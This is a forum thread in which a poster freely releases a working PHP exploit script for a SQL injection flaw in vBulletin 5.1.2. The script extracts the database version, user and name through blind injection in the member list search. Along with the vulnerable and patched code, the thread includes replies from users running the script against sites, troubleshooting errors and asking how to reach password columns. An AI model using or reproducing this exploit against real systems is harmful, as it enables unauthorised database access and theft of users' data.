Jump to content
Nytro

[RST] vBulletin 5.1.2 SQL Injection Exploit

Recommended Posts

Posted (edited)

Some idiots are trying to sell it:

http://1337day.com/exploits/22452

For 2000 $. Gay :))

Here it is. Free. :)

[phpcode]<?php

/*
Author: Nytro
Powered by: Romanian Security Team
Price: Free. Educational.
*/


error_reporting(E_ALL);
ini_set('display_errors', 1);


// Get arguments


$target_url = isset($argv[1]) ? $argv[1] : 'https://rstforums.com/v5';
$expression = str_replace('/', '\\/', $target_url);


// Function to send a POST request


function httpPost($url,$params)
{
$ch = curl_init($url);


curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $params);

curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
'Accept: application/json, text/javascript, */*; q=0.01',
'X-Requested-With: XMLHttpRequest',
'Referer: https://rstforums.com/v5/memberlist',
'Accept-Language: en-US,en;q=0.5',
'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
));


$output = curl_exec($ch);

if($output == FALSE) print htmlspecialchars(curl_error($ch));


curl_close($ch);
return $output;
}


// Function to get string between two other strings


function get_string_between($string, $start, $end)
{
$string = " ".$string;
$ini = strpos($string,$start);
if ($ini == 0) return "";
$ini += strlen($start);
$len = strpos($string,$end,$ini) - $ini;
return substr($string,$ini,$len);
}


// Get version


print "\r\nRomanian Security Team - vBulltin 5.1.2 SQL Injection\r\n\r\n";
print "Version: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1,1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1;


while(strpos($result, 'No Users Matched Your Query') == false)
{
$exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


$username = get_string_between($exploded[1], '">', '<\/a>');
print $username[0];

$letter++;
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),' . $letter . ',1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


// Get user


print "\r\nUser: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),1,1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1;


while(strpos($result, 'No Users Matched Your Query') == false)
{
$exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


$username = get_string_between($exploded[1], '">', '<\/a>');
print $username[0];


$letter++;
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),' . $letter . ',1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


// Get database


print "\r\nDatabse: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),1,1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1;


while(strpos($result, 'No Users Matched Your Query') == false)
{
$exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


$username = get_string_between($exploded[1], '">', '<\/a>');
print $username[0];


$letter++;
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),' . $letter . ',1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


print "\r\n"


?>[/phpcode]

More details:

The query was the following:

SELECT
user.userid, user.username, user.usergroupid AS usergroupid, user.lastactivity, user.options,
user.posts, user.joindate, user.usertitle,user.reputation,
session.lastactivity AS lastvisit,
IF(displaygroupid=0, user.usergroupid, displaygroupid) AS displaygroupid, infractiongroupid, user.usergroupid
FROM user AS user
LEFT JOIN session AS session ON session.userid = user.userid
WHERE user.username LIKE "[B][COLOR=#ff0000]D[/COLOR][/B]%"
GROUP BY user.userid
ORDER BY user.username ASC
LIMIT 0, 10;

The "D" is the controlled parameter. And, the quote (") was NOT escaped.

The query was generated with a function from querydefs.php:

public function fetchMemberList($params, $db, $check_only = false)

The vulnerable code:

            if (!empty($params['startswith']))

{

if ($params['startswith'] == '#')

{

$where[] = 'user.username REGEXP "^[^a-z].?"';

}

else

{

$where[] = 'user.username LIKE "' . $params['startswith'] . '%"';

}

}

And the patch contains the fix:

            if (!empty($params['startswith']))

{

if ($params['startswith'] == '#')

{

$where[] = 'user.username REGEXP "^[^a-z].?"';

}

else

{

$where[] = 'user.username LIKE "' . $db->escape_string_like($params['startswith']) . '%"';

}

}

So now, the value is escaped and SQL Injection is fixed.

vBulletin team moved really fast in fixing this problem.

More info: https://rstforums.com/forum/86951-rst-vbulletin-5-1-2-sql-injection.rst

Edited by Nytro
Posted

Nop, sa se faca de ras. :))

Dupa cum se vede, e BANAL exploit-ul. Si nu e util, sunt prea putine forumuri cu vBulletin 5.

O sa aduc mai multe detalii cand ajung la Bucuresti.

Posted
eroare

Notice: Undefined offset: 1 in /root/script.php on line 90

PHP Notice: Uninitialized string offset: 0 in /root/script.php on line 91

Trebuie sa il rulezi din consola.

php script.php http://site.com/forum

Posted
Notice: Undefined offset: 1 in /root/vbexploit.php on line 179

PHP Notice: Uninitialized string offset: 0 in /root/vbexploit.php on line 181

help

A postat si SirGod mai sus.

 php exploitname.php http://www.yourwebsite.com/forum

Posted

Nu mai incercati pe alte versiuni de vBulletin si o sa mearga. Scriptul cauta dupa un text anume, text ce nu se regaseste pe toate versiunile.

while(strpos($result, 'No Users Matched Your Query') == false)

Posted (edited)

Am incercat si eu pe 5.1.2, dar primesc o eroare:

Notice: Undefined variable: username in /root/nytro.php on line 90
PHP Notice: Undefined variable: username in /root/nytro.php on line 91

L.E: cred ca tine de link'ul in care se face "injectia" ...

Edited by nacks
Posted (edited)

Nota: danyweb a reusit sa il descopere inaintea tiganilor de la 1337gay. Si nu l-a facut public, nu a incercat sa il vanda... :)

Edit: Am adaugat detalii.

Edited by Nytro
Posted

Is there any protection on the password columns?

select salt from user where userid='1' (works)

select password from user where userid='1' (not works)

Thanks for the exploit nice found :))

Posted
root@bt:~/Desktop# php vbnew.php http://forum.vullsite.com/

Romanian Security Team - vBulltin 5.1.2 SQL Injection

Version: PHP Notice: Undefined offset: 1 in /root/Desktop/vbnew.php on line 92

Notice: Undefined offset: 1 in /root/Desktop/vbnew.php on line 92

PHP Notice: Uninitialized string offset: 0 in /root/Desktop/vbnew.php on line 93

Notice: Uninitialized string offset: 0 in /root/Desktop/vbnew.php on line 93

PHP Notice: Undefined offset: 1 in /root/Desktop/vbnew.php on line 92

Notice: Undefined offset: 1 in /root/Desktop/vbnew.php on line 92

PHP Notice: Uninitialized string offset: 0 in /root/Desktop/vbnew.php on line 93

Notice: Uninitialized string offset: 0 in /root/Desktop/vbnew.php on line 93

how fix mr Nytro ?

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...